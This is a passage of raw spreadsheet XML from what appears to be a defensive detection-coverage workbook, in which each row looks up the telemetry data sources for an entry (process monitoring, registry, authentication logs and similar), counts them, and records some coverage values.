        <v>2</v>
      </c>
      <c r="E310" s="53">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
    </row>
    <row r="311" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A311" s="53" t="s">
        <v>1920</v>
      </c>
      <c r="B311" s="53" t="str">
        <f>LOOKUP(A311,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="D311" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E311" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="312" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A312" s="53" t="s">
        <v>1924</v>
      </c>
      <c r="B312" s="53" t="str">
        <f>LOOKUP(A312,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Windows event logs,Process command-line parameters,Process monitoring,File monitoring,Windows Registry</v>
      </c>
      <c r="D312" s="53">
        <f t="shared" si="9"/>
        <v>6</v>
      </c>
      <c r="E312" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="313" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A313" s="55" t="s">
        <v>1929</v>
      </c>
      <c r="B313" s="53" t="str">
        <f>LOOKUP(A313,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C313" s="17">
        <v>100</v>
      </c>
      <c r="D313" s="53">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E313" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="314" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A314" s="53" t="s">
        <v>1933</v>
      </c>
      <c r="B314" s="53" t="str">
        <f>LOOKUP(A314,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Windows event logs,System calls,Binary file metadata,Process use of network,WMI Objects,File monitoring,Process command-line parameters,Process monitoring,Loaded DLLs,DLL monitoring,Windows Registry</v>
      </c>
      <c r="D314" s="53">
        <f t="shared" si="9"/>
        <v>12</v>
      </c>
      <c r="E314" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="315" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A315" s="53" t="s">
        <v>1939</v>
      </c>
      <c r="B315" s="53" t="str">
        <f>LOOKUP(A315,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Windows Registry</v>
      </c>
      <c r="D315" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E315" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="316" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A316" s="53" t="s">
        <v>1944</v>
      </c>
      <c r="B316" s="53" t="str">
        <f>LOOKUP(A316,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Windows Registry,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="D316" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E316" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="317" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A317" s="53" t="s">
        <v>1949</v>
      </c>
      <c r="B317" s="53" t="str">
        <f>LOOKUP(A317,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,WMI Objects</v>
      </c>
      <c r="D317" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E317" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="318" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A318" s="53" t="s">
        <v>1954</v>
      </c>
      <c r="B318" s="53" t="str">
        <f>LOOKUP(A318,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="D318" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E318" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="319" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A319" s="53" t="s">
        <v>1958</v>
      </c>
      <c r="B319" s="53" t="str">
        <f>LOOKUP(A319,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="D319" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E319" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="320" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A320" s="53" t="s">
        <v>1962</v>
      </c>
      <c r="B320" s="53" t="str">
        <f>LOOKUP(A320,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring,Binary file metadata</v>
      </c>
      <c r="D320" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E320" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="321" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A321" s="53" t="s">
        <v>1967</v>
      </c>
      <c r="B321" s="53" t="str">
        <f>LOOKUP(A321,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Windows Registry,DLL monitoring</v>
      </c>
      <c r="D321" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E321" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="322" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A322" s="53" t="s">
        <v>1972</v>
      </c>
      <c r="B322" s="53" t="str">
        <f>LOOKUP(A322,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring,Windows Registry</v>
      </c>
      <c r="D322" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E322" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="323" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A323" s="53" t="s">
        <v>1977</v>
      </c>
      <c r="B323" s="53" t="str">
        <f>LOOKUP(A323,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring,Loaded DLLs</v>
      </c>
      <c r="D323" s="53">
        <f t="shared" ref="D323:D386" si="11">LEN(TRIM(B323))-LEN(SUBSTITUTE(TRIM(B323),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E323" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="324" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A324" s="53" t="s">
        <v>1981</v>
      </c>
      <c r="B324" s="53" t="str">
        <f>LOOKUP(A324,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring,Loaded DLLs</v>
      </c>
      <c r="D324" s="53">
        <f t="shared" si="11"/>
        <v>4</v>
      </c>
      <c r="E324" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="325" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A325" s="53" t="s">
        <v>1985</v>
      </c>
      <c r="B325" s="53" t="str">
        <f>LOOKUP(A325,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Windows Registry</v>
      </c>
      <c r="D325" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E325" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="326" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A326" s="53" t="s">
        <v>1989</v>
      </c>
      <c r="B326" s="53" t="str">
        <f>LOOKUP(A326,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Windows event logs,Windows Registry,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="D326" s="53">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E326" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="327" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A327" s="53" t="s">
        <v>1994</v>
      </c>
      <c r="B327" s="53" t="str">
        <f>LOOKUP(A327,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="D327" s="53">
        <f t="shared" si="11"/>
        <v>4</v>
      </c>
      <c r="E327" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="328" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A328" s="55" t="s">
        <v>1999</v>
      </c>
      <c r="B328" s="53" t="str">
        <f>LOOKUP(A328,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C328" s="17">
        <v>100</v>
      </c>
      <c r="D328" s="53">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E328" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="329" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A329" s="53" t="s">
        <v>2003</v>
      </c>
      <c r="B329" s="53" t="str">
        <f>LOOKUP(A329,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Loaded DLLs,DLL monitoring,Windows Registry</v>
      </c>
      <c r="D329" s="53">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E329" s="53">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
    </row>
    <row r="330" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A330" s="55" t="s">
        <v>2008</v>
      </c>
      <c r="B330" s="53" t="str">
        <f>LOOKUP(A330,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C330" s="17">
        <v>0</v>
      </c>
      <c r="D330" s="53">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E330" s="53">
        <f t="shared" ref="E330:E393" si="12">LEN(TRIM(C330))-LEN(SUBSTITUTE(TRIM(C330),";",""))+1</f>
        <v>1</v>
      </c>
    </row>
    <row r="331" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A331" s="53" t="s">
        <v>2012</v>
      </c>
      <c r="B331" s="53" t="str">
        <f>LOOKUP(A331,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring</v>
      </c>
      <c r="D331" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E331" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="332" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A332" s="53" t="s">
        <v>2017</v>
      </c>
      <c r="B332" s="53" t="str">
        <f>LOOKUP(A332,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Windows Registry,Loaded DLLs</v>
      </c>
      <c r="D332" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E332" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="333" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A333" s="53" t="s">
        <v>2022</v>
      </c>
      <c r="B333" s="53" t="str">
        <f>LOOKUP(A333,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Binary file metadata,DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</v>
      </c>
      <c r="D333" s="53">
        <f t="shared" si="11"/>
        <v>6</v>
      </c>
      <c r="E333" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="334" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A334" s="53" t="s">
        <v>2027</v>
      </c>
      <c r="B334" s="53" t="str">
        <f>LOOKUP(A334,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring</v>
      </c>
      <c r="D334" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E334" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="335" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A335" s="53" t="s">
        <v>2032</v>
      </c>
      <c r="B335" s="53" t="str">
        <f>LOOKUP(A335,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Windows Registry,Loaded DLLs</v>
      </c>
      <c r="D335" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E335" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="336" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A336" s="53" t="s">
        <v>2036</v>
      </c>
      <c r="B336" s="53" t="str">
        <f>LOOKUP(A336,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D336" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E336" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="337" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A337" s="55" t="s">
        <v>2040</v>
      </c>
      <c r="B337" s="53" t="str">
        <f>LOOKUP(A337,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C337" s="17">
        <v>100</v>
      </c>
      <c r="D337" s="53">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E337" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="338" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A338" s="53" t="s">
        <v>2044</v>
      </c>
      <c r="B338" s="53" t="str">
        <f>LOOKUP(A338,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,File monitoring,Loaded DLLs,Process monitoring</v>
      </c>
      <c r="D338" s="53">
        <f t="shared" si="11"/>
        <v>4</v>
      </c>
      <c r="E338" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="339" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A339" s="53" t="s">
        <v>2049</v>
      </c>
      <c r="B339" s="53" t="str">
        <f>LOOKUP(A339,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D339" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E339" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="340" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A340" s="53" t="s">
        <v>2053</v>
      </c>
      <c r="B340" s="53" t="str">
        <f>LOOKUP(A340,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring,DLL monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="D340" s="53">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E340" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="341" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A341" s="53" t="s">
        <v>2058</v>
      </c>
      <c r="B341" s="53" t="str">
        <f>LOOKUP(A341,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D341" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E341" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="342" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A342" s="53" t="s">
        <v>2062</v>
      </c>
      <c r="B342" s="53" t="str">
        <f>LOOKUP(A342,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Windows Registry,File monitoring,DLL monitoring,API monitoring</v>
      </c>
      <c r="D342" s="53">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E342" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="343" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A343" s="53" t="s">
        <v>2067</v>
      </c>
      <c r="B343" s="53" t="str">
        <f>LOOKUP(A343,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process command-line parameters,API monitoring,Process monitoring</v>
      </c>
      <c r="D343" s="53">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E343" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="344" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A344" s="53" t="s">
        <v>2073</v>
      </c>
      <c r="B344" s="53" t="str">
        <f>LOOKUP(A344,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D344" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E344" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="345" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A345" s="53" t="s">
        <v>2077</v>
      </c>
      <c r="B345" s="53" t="str">
        <f>LOOKUP(A345,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="D345" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E345" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="346" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A346" s="53" t="s">
        <v>2083</v>
      </c>
      <c r="B346" s="53" t="str">
        <f>LOOKUP(A346,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters</v>
      </c>
      <c r="D346" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E346" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="347" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A347" s="53" t="s">
        <v>2088</v>
      </c>
      <c r="B347" s="53" t="str">
        <f>LOOKUP(A347,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,File monitoring</v>
      </c>
      <c r="D347" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E347" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="348" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A348" s="53" t="s">
        <v>2092</v>
      </c>
      <c r="B348" s="53" t="str">
        <f>LOOKUP(A348,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,OAuth audit logs,Authentication logs</v>
      </c>
      <c r="D348" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E348" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="349" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A349" s="53" t="s">
        <v>2100</v>
      </c>
      <c r="B349" s="53" t="str">
        <f>LOOKUP(A349,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,OAuth audit logs</v>
      </c>
      <c r="D349" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E349" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="350" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A350" s="55" t="s">
        <v>2106</v>
      </c>
      <c r="B350" s="53" t="str">
        <f>LOOKUP(A350,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C350" s="17">
        <v>100</v>
      </c>
      <c r="D350" s="53">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E350" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="351" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A351" s="55" t="s">
        <v>2110</v>
      </c>
      <c r="B351" s="53" t="str">
        <f>LOOKUP(A351,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C351" s="17">
        <v>100</v>
      </c>
      <c r="D351" s="53">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E351" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="352" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A352" s="53" t="s">
        <v>2114</v>
      </c>
      <c r="B352" s="53" t="str">
        <f>LOOKUP(A352,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Authentication logs</v>
      </c>
      <c r="D352" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E352" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="353" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A353" s="53" t="s">
        <v>2119</v>
      </c>
      <c r="B353" s="53" t="str">
        <f>LOOKUP(A353,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Authentication logs,AWS CloudTrail logs,Windows event logs,File monitoring,Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D353" s="53">
        <f t="shared" si="11"/>
        <v>8</v>
      </c>
      <c r="E353" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="354" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A354" s="53" t="s">
        <v>2124</v>
      </c>
      <c r="B354" s="53" t="str">
        <f>LOOKUP(A354,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring</v>
      </c>
      <c r="D354" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E354" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="355" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A355" s="53" t="s">
        <v>2129</v>
      </c>
      <c r="B355" s="53" t="str">
        <f>LOOKUP(A355,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Windows Registry</v>
      </c>
      <c r="D355" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E355" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="356" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A356" s="53" t="s">
        <v>2133</v>
      </c>
      <c r="B356" s="53" t="str">
        <f>LOOKUP(A356,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="D356" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E356" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="357" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A357" s="55" t="s">
        <v>2137</v>
      </c>
      <c r="B357" s="53" t="str">
        <f>LOOKUP(A357,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C357" s="17">
        <v>100</v>
      </c>
      <c r="D357" s="53">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E357" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="358" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A358" s="53" t="s">
        <v>2141</v>
      </c>
      <c r="B358" s="53" t="str">
        <f>LOOKUP(A358,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,AWS CloudTrail logs,Azure activity logs</v>
      </c>
      <c r="D358" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E358" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="359" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A359" s="53" t="s">
        <v>2146</v>
      </c>
      <c r="B359" s="53" t="str">
        <f>LOOKUP(A359,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Windows event logs</v>
      </c>
      <c r="D359" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E359" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="360" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A360" s="53" t="s">
        <v>2151</v>
      </c>
      <c r="B360" s="53" t="str">
        <f>LOOKUP(A360,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,File monitoring,Process command-line parameters,Process monitoring,API monitoring,Application logs,DLL monitoring,Loaded DLLs,Windows Registry,Windows event logs</v>
      </c>
      <c r="D360" s="53">
        <f t="shared" si="11"/>
        <v>10</v>
      </c>
      <c r="E360" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="361" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A361" s="53" t="s">
        <v>2157</v>
      </c>
      <c r="B361" s="53" t="str">
        <f>LOOKUP(A361,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters</v>
      </c>
      <c r="D361" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E361" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="362" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A362" s="55" t="s">
        <v>2161</v>
      </c>
      <c r="B362" s="53" t="str">
        <f>LOOKUP(A362,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata</v>
      </c>
      <c r="C362" s="17">
        <v>100</v>
      </c>
      <c r="D362" s="53">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E362" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="363" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A363" s="53" t="s">
        <v>2165</v>
      </c>
      <c r="B363" s="53" t="str">
        <f>LOOKUP(A363,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,API monitoring,Application logs,DLL monitoring,Loaded DLLs,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="D363" s="53">
        <f t="shared" si="11"/>
        <v>8</v>
      </c>
      <c r="E363" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="364" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A364" s="53" t="s">
        <v>2171</v>
      </c>
      <c r="B364" s="53" t="str">
        <f>LOOKUP(A364,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Digital certificate logs</v>
      </c>
      <c r="D364" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E364" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="365" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A365" s="53" t="s">
        <v>2176</v>
      </c>
      <c r="B365" s="53" t="str">
        <f>LOOKUP(A365,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Binary file metadata</v>
      </c>
      <c r="D365" s="53">
        <f t="shared" si="11"/>
        <v>2</v>
      </c>
      <c r="E365" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="366" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A366" s="53" t="s">
        <v>2181</v>
      </c>
      <c r="B366" s="53" t="str">
        <f>LOOKUP(A366,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,File monitoring,Process monitoring,System calls</v>
      </c>
      <c r="D366" s="53">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E366" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="367" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A367" s="53" t="s">
        <v>2186</v>
      </c>
      <c r="B367" s="53" t="str">
        <f>LOOKUP(A367,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,Process monitoring,File monitoring,System calls,API monitoring</v>
      </c>
      <c r="D367" s="53">
        <f t="shared" si="11"/>
        <v>5</v>
      </c>
      <c r="E367" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="368" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A368" s="55" t="s">
        <v>2191</v>
      </c>
      <c r="B368" s="53" t="str">
        <f>LOOKUP(A368,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C368" s="17">
        <v>100</v>
      </c>
      <c r="D368" s="53">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="E368" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="369" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A369" s="53" t="s">
        <v>2195</v>
      </c>
      <c r="B369" s="53" t="str">
        <f>LOOKUP(A369,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring,PowerShell logs,Process monitoring</v>
      </c>
      <c r="D369" s="53">
        <f t="shared" si="11"/>
        <v>4</v>
      </c>
      <c r="E369" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="370" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A370" s="53" t="s">
        <v>2200</v>
      </c>
      <c r="B370" s="53" t="str">
        <f>LOOKUP(A370,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Authentication logs,API monitoring,Windows Registry,Process monitoring,DLL monitoring</v>
      </c>
      <c r="D370" s="53">
        <f t="shared" si="11"/>
        <v>6</v>
      </c>
      <c r="E370" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="371" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A371" s="53" t="s">
        <v>2206</v>
      </c>
      <c r="B371" s="53" t="str">
        <f>LOOKUP(A371,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,API monitoring,DLL monitoring</v>
      </c>
      <c r="D371" s="53">
        <f t="shared" si="11"/>
        <v>3</v>
      </c>
      <c r="E371" s="53">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="372" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A372" s="53" t="s">
        <v>2211</v>
      </c>
      <c r="B372" s="53" t="str">
